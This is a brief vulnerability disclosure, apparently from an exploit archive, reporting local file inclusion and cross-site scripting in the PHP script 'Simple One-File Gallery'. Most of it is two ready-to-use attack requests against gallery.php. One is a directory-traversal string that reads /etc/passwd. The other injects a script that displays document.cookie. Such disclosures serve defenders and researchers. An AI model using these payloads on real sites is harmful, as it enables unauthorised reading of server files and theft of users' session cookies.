Simple One-File Gallery suffers from local file inclusion and cross site scripting vulnerabilities.
3822c65a6a3ada8839f41826ed25912flocal file include:
/gallery.php?f=../../../../../../../../../../../../etc/passwd
xss via php error :
/gallery.php?f=</textarea>'"><script>alert(document.cookie)</script>
regards laurent gaffiƩ
Comments
No comments yet, be the first!